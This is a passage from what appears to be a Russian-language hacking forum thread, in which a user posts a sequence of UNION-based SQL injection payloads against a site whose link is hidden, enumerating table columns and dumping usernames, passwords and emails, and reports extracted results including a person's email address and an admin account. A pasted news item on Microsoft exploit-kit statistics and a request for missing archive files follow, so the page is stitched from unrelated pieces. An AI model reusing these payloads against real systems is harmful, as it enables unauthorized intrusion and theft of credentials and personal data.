    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name='users' --
    а вот так заработало
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name='users' --
    нихуя не получилось вытяноуть из колнки users
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,group_concat(username),6,7,group_concat(password),9,10,11,12,13,14,15 from users --
    А вот эта команда вывела 1 @mail
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,(email),6,7,8,9,10,11,12,13,14,15 from users --

    8

    roberto@netweb.com.mx
    а вот так показало мне польхователя админа
    [Ссылки могут видеть только зарегистрированные пользователи.] UNION SELECT 1,2,3,4,(user),6,7,8,9,10,11,12,13,14,15 from users --
    admin

    Данные, опубликованные компанией Microsoft, свидетельствуют о том, что одним из самых распространённых эксплойтов для Windows остаётся так называемый CpLink. Он действует только в старых версиях операционной системы и полагается на уязвимость, которая была устранена ещё в 2010 году.

    На первом месте в рейтинге эксплойтов Microsoft остаётся Axpergle — элемент известного эксплойт-кита Angler, эксплуатирующий многочисленные уязвимости в Silverlight, Internet Explorer, Adobe Flash Player и Java. Другие эксплойт-киты, такие как Meadgive и NeutrinoEK, занимали во второй половине 2015 года третье и четвёртое место по популярности.
     
  13. kuzya

    kuzya Новорег

    Регистрация:
    17 мар 2017
    Сообщения:
    1
    Симпатии:
    0
    Розыгрышей:
    0
    Пол:
    Мужской
    в архиве нет файлов Less залей пож.
     

Поделиться этой страницей

Яндекс.Метрика